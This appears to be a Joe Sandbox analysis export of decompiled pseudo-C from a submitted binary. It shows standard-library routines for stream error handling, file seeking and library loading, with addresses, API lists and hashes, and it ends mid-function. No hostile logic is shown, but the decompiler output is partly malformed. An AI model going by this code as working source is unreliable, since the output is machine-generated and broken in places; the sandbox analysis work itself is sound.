                                                                                      			E00403B40(void* __ebx, intOrPtr __edx, void* __edi) {
                                                                                      				char _v8;
                                                                                      				char _v16;
                                                                                      				signed int _v20;
                                                                                      				intOrPtr _v44;
                                                                                      				intOrPtr _v48;
                                                                                      				intOrPtr _v52;
                                                                                      				intOrPtr _v84;
                                                                                      				char _v92;
                                                                                      				intOrPtr _v96;
                                                                                      				intOrPtr _v116;
                                                                                      				intOrPtr _v140;
                                                                                      				char _v192;
                                                                                      				char _v196;
                                                                                      				char _v200;
                                                                                      				intOrPtr* _v204;
                                                                                      				char _v208;
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				signed int _t85;
                                                                                      				signed int _t86;
                                                                                      				long _t103;
                                                                                      				void* _t116;
                                                                                      				void* _t124;
                                                                                      				void* _t130;
                                                                                      				intOrPtr* _t133;
                                                                                      				void* _t140;
                                                                                      				intOrPtr* _t153;
                                                                                      				intOrPtr* _t155;
                                                                                      				void* _t161;
                                                                                      				void* _t162;
                                                                                      				signed int _t163;
                                                                                      				void* _t164;
                                                                                      				void* _t166;
                                                                                      
                                                                                      				_t158 = __edi;
                                                                                      				_t157 = __edx;
                                                                                      				_t135 = __ebx;
                                                                                      				_push(0xffffffff);
                                                                                      				_push(0x4316e0);
                                                                                      				_push( *[fs:0x0]);
                                                                                      				_t85 =  *0x443048; // 0x9900ec21
                                                                                      				_t86 = _t85 ^ _t163;
                                                                                      				_v20 = _t86;
                                                                                      				_push(_t86);
                                                                                      				 *[fs:0x0] =  &_v16;
                                                                                      				_v200 = 0;
                                                                                      				E00415180(__edi,  &_v196, 0, 0xb0);
                                                                                      				_v196 = 0x43ea74;
                                                                                      				_t161 =  >=  ?  *0x443aa4 : 0x443aa4;
                                                                                      				_v84 = 0;
                                                                                      				_v52 = 0;
                                                                                      				_v48 = 0;
                                                                                      				_v44 = 0;
                                                                                      				_t166 = _t164 - 0xc0 + 8;
                                                                                      				_v8 = 0;
                                                                                      				_v200 = 1;
                                                                                      				_v92 = 0x43ea98;
                                                                                      				_v96 = 0x60;
                                                                                      				E00407F70( &_v92, _t157,  *0x443ab8 - 0x10,  &_v192);
                                                                                      				_v8 = 2;
                                                                                      				_t17 =  &_v196; // 0x43ea74
                                                                                      				 *((intOrPtr*)(_t163 +  *((intOrPtr*)( *_t17 + 4)) - 0xc0)) = 0x43ea70;
                                                                                      				_t21 =  &_v196; // 0x43ea70
                                                                                      				_t23 =  *((intOrPtr*)( *_t21 + 4)) - 0x68; // -102
                                                                                      				 *((intOrPtr*)(_t163 +  *((intOrPtr*)( *_t21 + 4)) - 0xc4)) = _t23;
                                                                                      				E00407040( &_v192,  *0x443ab8 - 0x10);
                                                                                      				_v8 = 3;
                                                                                      				if(_v116 != 0) {
                                                                                      					L5:
                                                                                      					_t39 =  &_v196; // 0x43ea70
                                                                                      					_t40 =  &_v196; // 0x43ea70
                                                                                      					_t140 = _t40 +  *((intOrPtr*)( *_t39 + 4));
                                                                                      					 *(_t140 + 0x38) = 0x00000002 + ( *(_t140 + 0x38) == 0x00000000) * 0x00000004 |  *(_t140 + 0xc);
                                                                                      					E00403A00(_t135, _t140, 0x00000002 + ( *(_t140 + 0x38) == 0x00000000) * 0x00000004 |  *(_t140 + 0xc), 0);
                                                                                      					L6:
                                                                                      					_v8 = 5;
                                                                                      					_t103 = GetCurrentProcessId();
                                                                                      					_t49 =  &_v196; // 0x43ea70
                                                                                      					E004059F0(_t49, _t157, _t103);
                                                                                      					if(E00406F50( &_v192) == 0) {
                                                                                      						_t51 =  &_v196; // 0x43ea70
                                                                                      						_t52 =  &_v196; // 0x43ea70
                                                                                      						E00403A00(_t135, _t52 +  *((intOrPtr*)( *_t51 + 4)), 0x00000002 + (0 |  *((intOrPtr*)(_t52 +  *((intOrPtr*)( *_t51 + 4)) + 0x38)) == 0x00000000) * 0x00000004 |  *(_t52 +  *((intOrPtr*)( *_t51 + 4)) + 0xc), 0);
                                                                                      					}
                                                                                      					_t60 =  &_v196; // 0x43ea70
                                                                                      					 *((intOrPtr*)(_t163 +  *((intOrPtr*)( *_t60 + 4)) - 0xc0)) = 0x43ea70;
                                                                                      					_t64 =  &_v196; // 0x43ea70
                                                                                      					_t66 =  *((intOrPtr*)( *_t64 + 4)) - 0x68; // -99
                                                                                      					 *((intOrPtr*)(_t163 +  *((intOrPtr*)( *_t64 + 4)) - 0xc4)) = _t66;
                                                                                      					E00405690( &_v192);
                                                                                      					_t70 =  &_v196; // 0x43ea70
                                                                                      					 *((intOrPtr*)(_t163 +  *((intOrPtr*)( *_t70 + 4)) - 0xc0)) = 0x43ea98;
                                                                                      					_t75 = _v196 + 4; // 0x74636576
                                                                                      					_t76 =  *_t75 - 8; // 0x7463656e
                                                                                      					 *((intOrPtr*)(_t163 +  *_t75 - 0xc4)) = _t76;
                                                                                      					_v8 = 6;
                                                                                      					_v92 = 0x43ea28;
                                                                                      					_t116 = E004128AD( &_v92);
                                                                                      					 *[fs:0x0] = _v16;
                                                                                      					_pop(_t162);
                                                                                      					return E0041361E(_t116, _t135, _v20 ^ _t163, _t157, _t158, _t162);
                                                                                      				}
                                                                                      				_push(0x40);
                                                                                      				_push(2);
                                                                                      				_t124 = E00412A0C(_t157, 0x443aa4);
                                                                                      				_t166 = _t166 + 0xc;
                                                                                      				if(_t124 == 0) {
                                                                                      					goto L5;
                                                                                      				} else {
                                                                                      					E00406E40( &_v192, _t124, 1);
                                                                                      					_t153 =  *((intOrPtr*)(_v140 + 4));
                                                                                      					_v204 = _t153;
                                                                                      					 *((intOrPtr*)( *_t153 + 4))();
                                                                                      					_v8 = 4;
                                                                                      					_push( &_v208);
                                                                                      					_t130 = E00408400(__ebx, _t157, _t158, _t161);
                                                                                      					_t166 = _t166 + 4;
                                                                                      					E00406CE0( &_v192, _t130);
                                                                                      					_t155 = _v204;
                                                                                      					if(_t155 != 0) {
                                                                                      						_t133 =  *((intOrPtr*)( *_t155 + 8))();
                                                                                      						if(_t133 != 0) {
                                                                                      							_t157 =  *_t133;
                                                                                      							 *((intOrPtr*)( *_t133))(1);
                                                                                      						}
                                                                                      					}
                                                                                      					goto L6;
                                                                                      				}
                                                                                      			}




































                                                                                      0x00403b40
                                                                                      0x00403b40
                                                                                      0x00403b40
                                                                                      0x00403b43
                                                                                      0x00403b45
                                                                                      0x00403b50
                                                                                      0x00403b57
                                                                                      0x00403b5c
                                                                                      0x00403b5e
                                                                                      0x00403b62
                                                                                      0x00403b66
                                                                                      0x00403b77
                                                                                      0x00403b84
                                                                                      0x00403b95
                                                                                      0x00403b9f
                                                                                      0x00403ba6
                                                                                      0x00403bad
                                                                                      0x00403bb4
                                                                                      0x00403bbb
                                                                                      0x00403bc2
                                                                                      0x00403bc5
                                                                                      0x00403bd2
                                                                                      0x00403bdf
                                                                                      0x00403be6
                                                                                      0x00403bee
                                                                                      0x00403bf3
                                                                                      0x00403bfa
                                                                                      0x00403c03
                                                                                      0x00403c0e
                                                                                      0x00403c17
                                                                                      0x00403c1a
                                                                                      0x00403c27
                                                                                      0x00403c2c
                                                                                      0x00403c34
                                                                                      0x00403ca5
                                                                                      0x00403ca5
                                                                                      0x00403cab
                                                                                      0x00403cb3
                                                                                      0x00403cc5
                                                                                      0x00403cc9
                                                                                      0x00403cce
                                                                                      0x00403cce
                                                                                      0x00403cd5
                                                                                      0x00403cdc
                                                                                      0x00403ce2
                                                                                      0x00403cf4
                                                                                      0x00403cf6
                                                                                      0x00403cfc
                                                                                      0x00403d1a
                                                                                      0x00403d1a
                                                                                      0x00403d1f
                                                                                      0x00403d28
                                                                                      0x00403d33
                                                                                      0x00403d3c
                                                                                      0x00403d3f
                                                                                      0x00403d4c
                                                                                      0x00403d51
                                                                                      0x00403d5a
                                                                                      0x00403d6b
                                                                                      0x00403d6e
                                                                                      0x00403d71
                                                                                      0x00403d7b
                                                                                      0x00403d83
                                                                                      0x00403d8a
                                                                                      0x00403d95
                                                                                      0x00403d9d
                                                                                      0x00403dab
                                                                                      0x00403dab
                                                                                      0x00403c36
                                                                                      0x00403c38
                                                                                      0x00403c3b
                                                                                      0x00403c40
                                                                                      0x00403c45
                                                                                      0x00000000
                                                                                      0x00403c47
                                                                                      0x00403c50
                                                                                      0x00403c5b
                                                                                      0x00403c5e
                                                                                      0x00403c66
                                                                                      0x00403c6f
                                                                                      0x00403c73
                                                                                      0x00403c74
                                                                                      0x00403c79
                                                                                      0x00403c83
                                                                                      0x00403c88
                                                                                      0x00403c90
                                                                                      0x00403c94
                                                                                      0x00403c99
                                                                                      0x00403c9b
                                                                                      0x00403ca1
                                                                                      0x00403ca1
                                                                                      0x00403c99
                                                                                      0x00000000
                                                                                      0x00403c90

                                                                                      APIs
                                                                                        • Part of subcall function 00407F70: std::locale::_Init.LIBCPMT ref: 00408002
                                                                                        • Part of subcall function 00407040: std::locale::_Init.LIBCPMT ref: 00407092
                                                                                      • GetCurrentProcessId.KERNEL32(00000000,?,9900EC21), ref: 00403CD5
                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00403D8A
                                                                                        • Part of subcall function 00408400: std::_Lockit::_Lockit.LIBCPMT ref: 00408436
                                                                                        • Part of subcall function 00408400: std::_Lockit::_Lockit.LIBCPMT ref: 00408458
                                                                                        • Part of subcall function 00408400: std::_Lockit::~_Lockit.LIBCPMT ref: 00408478
                                                                                        • Part of subcall function 00408400: std::_Lockit::~_Lockit.LIBCPMT ref: 0040849F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: Lockitstd::_$InitLockit::_Lockit::~_std::locale::_$CurrentIos_base_dtorProcessstd::ios_base::_
                                                                                      • String ID: (C$`$tC
                                                                                      • API String ID: 1043075861-338296439
                                                                                      • Opcode ID: 48c43b832412ca86593ee27251fd4a4c1b0041246829134af07880bb2d8e2cd3
                                                                                      • Instruction ID: d2221ce5aec08ae90bd4016673533955d953cbb34cf6aa8034e8684be79d6cfe
                                                                                      • Opcode Fuzzy Hash: 48c43b832412ca86593ee27251fd4a4c1b0041246829134af07880bb2d8e2cd3
                                                                                      • Instruction Fuzzy Hash: 48612C74A01218DFEB10DF65CD89F9ABBB8FF04308F1445AEE509AB291D779AA44CF44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 58%
                                                                                      			E00423963(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, char _a24) {
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				signed int _v16;
                                                                                      				char _v20;
                                                                                      				intOrPtr _v24;
                                                                                      				signed int _v28;
                                                                                      				char _v32;
                                                                                      				signed int _v36;
                                                                                      				signed int _t77;
                                                                                      				signed int _t78;
                                                                                      				char _t79;
                                                                                      				char _t80;
                                                                                      				intOrPtr* _t81;
                                                                                      				signed int _t84;
                                                                                      				void* _t85;
                                                                                      				signed int _t87;
                                                                                      				signed int _t90;
                                                                                      				void* _t91;
                                                                                      				void* _t92;
                                                                                      				intOrPtr _t95;
                                                                                      				signed char _t99;
                                                                                      				signed char _t102;
                                                                                      				signed char _t108;
                                                                                      				intOrPtr _t109;
                                                                                      				signed int _t117;
                                                                                      				signed int _t118;
                                                                                      				intOrPtr _t123;
                                                                                      				signed int _t124;
                                                                                      				intOrPtr _t126;
                                                                                      				signed int _t127;
                                                                                      				signed int _t130;
                                                                                      				signed int _t131;
                                                                                      				intOrPtr _t137;
                                                                                      
                                                                                      				_t77 = E0042087B(_a4);
                                                                                      				_t135 = _t77;
                                                                                      				_v24 = 2;
                                                                                      				_t78 = _t77 >> 6;
                                                                                      				_v36 = _t78;
                                                                                      				_t117 = (_t77 & 0x0000003f) * 0x38;
                                                                                      				_t79 =  *((intOrPtr*)(0x444b30 + _t78 * 4));
                                                                                      				_v32 = _t79;
                                                                                      				_v8 = 0;
                                                                                      				_v28 = _t117;
                                                                                      				_t80 =  *((intOrPtr*)(_t117 + _t79 + 0x29));
                                                                                      				_v20 = _t80;
                                                                                      				if(_t80 != 1) {
                                                                                      					_v24 = 1;
                                                                                      				}
                                                                                      				_t81 = _a4;
                                                                                      				_t118 =  *((intOrPtr*)(_t81 + 8));
                                                                                      				_v16 = _t118;
                                                                                      				if(_t118 != 0) {
                                                                                      					asm("cdq");
                                                                                      					_v12 = _t130;
                                                                                      					asm("cdq");
                                                                                      					_t84 = _v12;
                                                                                      					_v16 =  *_t81 -  *((intOrPtr*)(_t81 + 4)) + _v16;
                                                                                      					_t23 =  &_v32; // 0x423939
                                                                                      					_t123 =  *_t23;
                                                                                      					asm("adc eax, edx");
                                                                                      					_t131 = _v28;
                                                                                      					_v12 = _t84;
                                                                                      					__eflags =  *((char*)(_t131 + _t123 + 0x28));
                                                                                      					_t124 = _v16;
                                                                                      					if( *((char*)(_t131 + _t123 + 0x28)) < 0) {
                                                                                      						_t31 =  &_a24; // 0x423939
                                                                                      						_t85 = E00425445(_t135, 0, 0, 2,  *_t31);
                                                                                      						__eflags = _t85 - _a8;
                                                                                      						if(_t85 != _a8) {
                                                                                      							L13:
                                                                                      							_t87 = E00425445(_t135, _a8, _a12, 0, _a24) & _t131;
                                                                                      							_t131 = _t131 | 0xffffffff;
                                                                                      							__eflags = _t87 - _t131;
                                                                                      							if(_t87 != _t131) {
                                                                                      								__eflags = _v12;
                                                                                      								if(__eflags > 0) {
                                                                                      									L21:
                                                                                      									asm("cdq");
                                                                                      									_v12 =  *((intOrPtr*)(_a4 + 0x18));
                                                                                      									L22:
                                                                                      									_t90 = _v28;
                                                                                      									_t126 =  *((intOrPtr*)(0x444b30 + _v36 * 4));
                                                                                      									__eflags =  *(_t90 + _t126 + 0x28) & 0x00000004;
                                                                                      									if(( *(_t90 + _t126 + 0x28) & 0x00000004) == 0) {
                                                                                      										_t124 = _v12;
                                                                                      										L28:
                                                                                      										_push(_v8);
                                                                                      										_t113 = _v24;
                                                                                      										_push(_v24);
                                                                                      										_push(_t131);
                                                                                      										L29:
                                                                                      										_push(_t124);
                                                                                      										_t91 = E00430EB0();
                                                                                      										_t92 = E00430EB0(_a16, _a20, _t113, _v8);
                                                                                      										asm("sbb edx, edi");
                                                                                      										asm("adc edx, [ebp+0x10]");
                                                                                      										return _t92 - _t91 + _a8;
                                                                                      									}
                                                                                      									_t95 = _v20;
                                                                                      									__eflags = _t95 - 1;
                                                                                      									if(_t95 == 1) {
                                                                                      										L25:
                                                                                      										_push(2);
                                                                                      										_pop(1);
                                                                                      										L26:
                                                                                      										_t127 = _v12;
                                                                                      										L12:
                                                                                      										_t124 = _t127 + 1;
                                                                                      										asm("adc edx, edi");
                                                                                      										goto L28;
                                                                                      									}
                                                                                      									__eflags = _t95 - 2;
                                                                                      									if(_t95 != 2) {
                                                                                      										goto L26;
                                                                                      									}
                                                                                      									goto L25;
                                                                                      								}
                                                                                      								_v12 = 0x200;
                                                                                      								if(__eflags < 0) {
                                                                                      									L18:
                                                                                      									_t99 =  *(_a4 + 0xc) >> 6;
                                                                                      									__eflags = 1 & _t99;
                                                                                      									if((1 & _t99) == 0) {
                                                                                      										goto L21;
                                                                                      									}
                                                                                      									_t102 =  *(_a4 + 0xc) >> 8;
                                                                                      									__eflags = 1 & _t102;
                                                                                      									if((1 & _t102) != 0) {
                                                                                      										goto L21;
                                                                                      									}
                                                                                      									_t131 = 0;
                                                                                      									goto L22;
                                                                                      								}
                                                                                      								__eflags = _v16 - 0x200;
                                                                                      								if(_v16 > 0x200) {
                                                                                      									goto L21;
                                                                                      								}
                                                                                      								goto L18;
                                                                                      							}
                                                                                      							return _t131;
                                                                                      						}
                                                                                      						__eflags = _t131 - _a12;
                                                                                      						if(_t131 != _a12) {
                                                                                      							goto L13;
                                                                                      						}
                                                                                      						_t137 = _a4;
                                                                                      						_t124 = E00423CCD( *((intOrPtr*)(_t137 + 4)), _v16 +  *((intOrPtr*)(_t137 + 4)), _v20) + _v16;
                                                                                      						asm("adc edx, [ebp-0x8]");
                                                                                      						_t108 =  *(_t137 + 0xc) >> 5;
                                                                                      						__eflags = 1 & _t108;
                                                                                      						if((1 & _t108) == 0) {
                                                                                      							goto L28;
                                                                                      						}
                                                                                      						_t109 = _v20;
                                                                                      						__eflags = _t109 - 1;
                                                                                      						if(_t109 == 1) {
                                                                                      							L11:
                                                                                      							_push(2);
                                                                                      							_pop(1);
                                                                                      							goto L12;
                                                                                      						}
                                                                                      						__eflags = _t109 - 2;
                                                                                      						if(_t109 != 2) {
                                                                                      							goto L12;
                                                                                      						}
                                                                                      						goto L11;
                                                                                      					}
                                                                                      					_push(_v8);
                                                                                      					_t113 = _v24;
                                                                                      					_push(_v24);
                                                                                      					_push(_t84);
                                                                                      					goto L29;
                                                                                      				} else {
                                                                                      					return _a8;
                                                                                      				}
                                                                                      			}




































                                                                                      0x00423971
                                                                                      0x00423976
                                                                                      0x00423978
                                                                                      0x00423980
                                                                                      0x00423988
                                                                                      0x0042398b
                                                                                      0x00423993
                                                                                      0x0042399a
                                                                                      0x0042399d
                                                                                      0x004239a0
                                                                                      0x004239a3
                                                                                      0x004239a7
                                                                                      0x004239ac
                                                                                      0x004239ae
                                                                                      0x004239ae
                                                                                      0x004239b1
                                                                                      0x004239b4
                                                                                      0x004239b7
                                                                                      0x004239bc
                                                                                      0x004239d0
                                                                                      0x004239d3
                                                                                      0x004239d9
                                                                                      0x004239dc
                                                                                      0x004239df
                                                                                      0x004239e2
                                                                                      0x004239e2
                                                                                      0x004239e5
                                                                                      0x004239e7
                                                                                      0x004239ea
                                                                                      0x004239ed
                                                                                      0x004239f2
                                                                                      0x004239f5
                                                                                      0x00423a04
                                                                                      0x00423a0c
                                                                                      0x00423a14
                                                                                      0x00423a17
                                                                                      0x00423a64
                                                                                      0x00423a74
                                                                                      0x00423a79
                                                                                      0x00423a7c
                                                                                      0x00423a7e
                                                                                      0x00423a87
                                                                                      0x00423a8a
                                                                                      0x00423abb
                                                                                      0x00423ac1
                                                                                      0x00423ac2
                                                                                      0x00423ac5
                                                                                      0x00423ac8
                                                                                      0x00423acb
                                                                                      0x00423ad2
                                                                                      0x00423ad7
                                                                                      0x00423aef
                                                                                      0x00423af2
                                                                                      0x00423af2
                                                                                      0x00423af5
                                                                                      0x00423af8
                                                                                      0x00423af9
                                                                                      0x00423afa
                                                                                      0x00423afa
                                                                                      0x00423afb
                                                                                      0x00423b0e
                                                                                      0x00423b15
                                                                                      0x00423b1a
                                                                                      0x00000000
                                                                                      0x00423b1a
                                                                                      0x00423ad9
                                                                                      0x00423adc
                                                                                      0x00423ade
                                                                                      0x00423ae4
                                                                                      0x00423ae4
                                                                                      0x00423ae6
                                                                                      0x00423ae7
                                                                                      0x00423ae7
                                                                                      0x00423a5b
                                                                                      0x00423a5b
                                                                                      0x00423a5d
                                                                                      0x00000000
                                                                                      0x00423a5d
                                                                                      0x00423ae0
                                                                                      0x00423ae2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00423ae2
                                                                                      0x00423a91
                                                                                      0x00423a94
                                                                                      0x00423a9b
                                                                                      0x00423aa2
                                                                                      0x00423aa5
                                                                                      0x00423aa7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00423ab0
                                                                                      0x00423ab3
                                                                                      0x00423ab5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00423ab7
                                                                                      0x00000000
                                                                                      0x00423ab7
                                                                                      0x00423a96
                                                                                      0x00423a99
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00423a99
                                                                                      0x00000000
                                                                                      0x00423a80
                                                                                      0x00423a19
                                                                                      0x00423a1c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00423a1e
                                                                                      0x00423a38
                                                                                      0x00423a3e
                                                                                      0x00423a42
                                                                                      0x00423a45
                                                                                      0x00423a47
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00423a4d
                                                                                      0x00423a50
                                                                                      0x00423a52
                                                                                      0x00423a58
                                                                                      0x00423a58
                                                                                      0x00423a5a
                                                                                      0x00000000
                                                                                      0x00423a5a
                                                                                      0x00423a54
                                                                                      0x00423a56
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00423a56
                                                                                      0x004239f7
                                                                                      0x004239fa
                                                                                      0x004239fd
                                                                                      0x004239fe
                                                                                      0x00000000
                                                                                      0x004239be
                                                                                      0x00000000
                                                                                      0x004239c1

                                                                                      APIs
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423AFB
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423B0E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                      • String ID: 99B$99B
                                                                                      • API String ID: 885266447-862792131
                                                                                      • Opcode ID: fb1fee3e0c56fe8e9cde052c79b43c72f641b9244b6fad5d831a619671f24cc1
                                                                                      • Instruction ID: b02a6e7cbcacb517213776693aab9805db623b7f4d60859a31f81b5ed3266605
                                                                                      • Opcode Fuzzy Hash: fb1fee3e0c56fe8e9cde052c79b43c72f641b9244b6fad5d831a619671f24cc1
                                                                                      • Instruction Fuzzy Hash: F951B271B00259AFCF14CF98D881AAEBBB2EF48311F54806AF89597351D3389E42CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 56%
                                                                                      			E00403A00(void* __ebx, void* __ecx, signed int _a4, char _a8) {
                                                                                      				char _v24;
                                                                                      				char _v32;
                                                                                      				intOrPtr _v48;
                                                                                      				signed int _t20;
                                                                                      				void* _t23;
                                                                                      				void* _t33;
                                                                                      				signed char _t36;
                                                                                      				intOrPtr* _t37;
                                                                                      				intOrPtr* _t40;
                                                                                      				char* _t45;
                                                                                      				intOrPtr _t46;
                                                                                      
                                                                                      				_t33 = __ebx;
                                                                                      				_t20 = _a4 & 0x00000017;
                                                                                      				 *(__ecx + 0xc) = _t20;
                                                                                      				_t36 =  *(__ecx + 0x10) & _t20;
                                                                                      				if(_t36 == 0) {
                                                                                      					return _t20;
                                                                                      				} else {
                                                                                      					if(_a8 != 0) {
                                                                                      						E00414B7B(0, 0);
                                                                                      					}
                                                                                      					if((_t36 & 0x00000004) == 0) {
                                                                                      						_t45 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
                                                                                      					} else {
                                                                                      						_t45 = "ios_base::badbit set";
                                                                                      					}
                                                                                      					_t23 = E00402FB0( &_v32, 1);
                                                                                      					_t37 =  &_v24;
                                                                                      					_push(_t23);
                                                                                      					E00403910(_t33, _t37, _t45);
                                                                                      					E00414B7B( &_v32, 0x4422f0);
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					_push(_t45);
                                                                                      					_t46 = _v48;
                                                                                      					asm("xorps xmm0, xmm0");
                                                                                      					_t40 = _t37;
                                                                                      					 *_t40 = 0x433244;
                                                                                      					asm("movq [eax], xmm0");
                                                                                      					E00414631(_t46 + 4, _t40 + 4);
                                                                                      					 *_t40 = 0x43459c;
                                                                                      					 *((intOrPtr*)(_t40 + 0xc)) =  *((intOrPtr*)(_t46 + 0xc));
                                                                                      					 *((intOrPtr*)(_t40 + 0x10)) =  *((intOrPtr*)(_t46 + 0x10));
                                                                                      					 *_t40 = 0x4345d0;
                                                                                      					return _t40;
                                                                                      				}
                                                                                      			}














                                                                                      0x00403a00
                                                                                      0x00403a0c
                                                                                      0x00403a0f
                                                                                      0x00403a16
                                                                                      0x00403a18
                                                                                      0x00403a26
                                                                                      0x00403a1a
                                                                                      0x00403a1e
                                                                                      0x00403a2d
                                                                                      0x00403a2d
                                                                                      0x00403a35
                                                                                      0x00403a4b
                                                                                      0x00403a37
                                                                                      0x00403a37
                                                                                      0x00403a37
                                                                                      0x00403a55
                                                                                      0x00403a5d
                                                                                      0x00403a61
                                                                                      0x00403a63
                                                                                      0x00403a72
                                                                                      0x00403a77
                                                                                      0x00403a78
                                                                                      0x00403a79
                                                                                      0x00403a7a
                                                                                      0x00403a7b
                                                                                      0x00403a7c
                                                                                      0x00403a7d
                                                                                      0x00403a7e
                                                                                      0x00403a7f
                                                                                      0x00403a83
                                                                                      0x00403a84
                                                                                      0x00403a87
                                                                                      0x00403a8b
                                                                                      0x00403a91
                                                                                      0x00403a97
                                                                                      0x00403a9f
                                                                                      0x00403aa4
                                                                                      0x00403ab3
                                                                                      0x00403ab8
                                                                                      0x00403abb
                                                                                      0x00403ac4
                                                                                      0x00403ac4

                                                                                      APIs
                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00403A9F
                                                                                        • Part of subcall function 00414B7B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,004123EF,?,00441908,00402904,string too long,00402904,?,?,?), ref: 00414BDB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionRaise___std_exception_copy
                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                      • API String ID: 3109751735-1866435925
                                                                                      • Opcode ID: efa896197464d988a22a4665368f36291d2b7245f706ea407db39219bc463d9f
                                                                                      • Instruction ID: 5ca9c8b6697ae70dd92285cccf55e05d5f07217f2c4b3bb58837881ace8174e9
                                                                                      • Opcode Fuzzy Hash: efa896197464d988a22a4665368f36291d2b7245f706ea407db39219bc463d9f
                                                                                      • Instruction Fuzzy Hash: E71124B2A103046BC710DE59C801BD6B7ECAF49311F14892BFA58A76C1F778EA54CF99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00417B42(WCHAR* _a4) {
                                                                                      				struct HINSTANCE__* _t4;
                                                                                      
                                                                                      				_t4 = LoadLibraryExW(_a4, 0, 0x800);
                                                                                      				if(_t4 != 0) {
                                                                                      					return _t4;
                                                                                      				} else {
                                                                                      					if(GetLastError() != 0x57 || E00420218(_a4, L"api-ms-", 7) == 0) {
                                                                                      						return 0;
                                                                                      					}
                                                                                      					return LoadLibraryExW(_a4, 0, 0);
                                                                                      				}
                                                                                      			}




                                                                                      0x00417b4f
                                                                                      0x00417b57
                                                                                      0x00417b8c
                                                                                      0x00417b59
                                                                                      0x00417b62
                                                                                      0x00000000
                                                                                      0x00417b89
                                                                                      0x00417b88
                                                                                      0x00417b88

                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00417AF3,00000000,?,004447D4,?,?,?,00417C96,00000004,InitializeCriticalSectionEx,00435170,InitializeCriticalSectionEx), ref: 00417B4F
                                                                                      • GetLastError.KERNEL32(?,00417AF3,00000000,?,004447D4,?,?,?,00417C96,00000004,InitializeCriticalSectionEx,00435170,InitializeCriticalSectionEx,00000000,?,00417A4D), ref: 00417B59
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00417B81
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                      • String ID: api-ms-
                                                                                      • API String ID: 3177248105-2084034818
                                                                                      • Opcode ID: 286c89d422db71c697f3237b2d49fb5709d2675eb0362af91fcace01508841d4
                                                                                      • Instruction ID: 8af73c1b971d03717dcad23543ed2b47545356c011706117da99b8513980ac08
                                                                                      • Opcode Fuzzy Hash: 286c89d422db71c697f3237b2d49fb5709d2675eb0362af91fcace01508841d4
                                                                                      • Instruction Fuzzy Hash: EFE048307C8205B7DF101F61EC47F993F749B00B56F104032F90CA85E1E769A99495DC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 78%
                                                                                      			E00420E68(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                      				char _v16;
                                                                                      				signed int _v20;
                                                                                      				char _v28;
                                                                                      				char _v35;
                                                                                      				signed char _v36;
                                                                                      				void _v44;
                                                                                      				long _v48;
                                                                                      				signed char* _v52;
                                                                                      				char _v53;
                                                                                      				long _v60;
                                                                                      				intOrPtr _v64;
                                                                                      				struct _OVERLAPPED* _v68;
                                                                                      				signed int _v72;
                                                                                      				struct _OVERLAPPED* _v76;
                                                                                      				signed int _v80;
                                                                                      				signed int _v84;
                                                                                      				intOrPtr _v88;
                                                                                      				void _v92;
                                                                                      				long _v96;
                                                                                      				signed char* _v100;
                                                                                      				void* _v104;
